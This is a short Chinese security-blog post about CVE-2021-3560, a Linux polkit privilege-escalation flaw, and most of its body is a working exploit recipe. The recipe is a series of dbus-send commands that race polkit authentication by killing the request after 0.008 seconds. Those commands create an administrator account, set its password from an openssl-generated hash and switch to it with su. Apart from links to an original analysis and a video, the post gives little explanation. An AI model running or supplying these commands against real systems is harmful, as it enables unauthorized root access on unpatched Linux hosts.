CVE-2021-3560 Linux polkit 提权

张渗透技巧 4年前

5.92W 0

文章来源：安全鸭

看到大佬的操作，连复现都没复现明白，还差点意思。

time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1
#创建用户
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep 0.008s ; kill $!
#查看用户
id boris
#openssl生成密码hash值
openssl passwd -5 iaminvincible!
#为用户设置密码。注意string:''处填入上面openssl生成的hash值
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1001 org.freedesktop.Accounts.User.SetPassword string:'' string:GoldenEye & sleep 0.008s ; kill $!
#切换用户
su - boris

原文复现及分析：

https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

视频链接：

https://youtu.be/QZhz64yEd0g

CVE-2021-3560(1),Linux polkit(1),提权(50)

本文原创，作者：张，其版权均为华盟网所有。如需转载，请注明出处：https://www.77169.net/html/281049.html

官方

张

1.49K篇文章 69.62M总阅读量

上一篇：某勒索软件源代码在黑客论坛上泄露下一篇：原来 Linux 日志文件系统是这样工作的~

CVE-2021-3560 Linux polkit 提权

相关文章

The-Backdoor-Factory介绍

丢掉PSEXEC来横向渗透

域渗透中找DC

发表评论取消回复

相关文章

The-Backdoor-Factory介绍

丢掉PSEXEC来横向渗透

域渗透中找DC

发表评论 取消回复

发表评论取消回复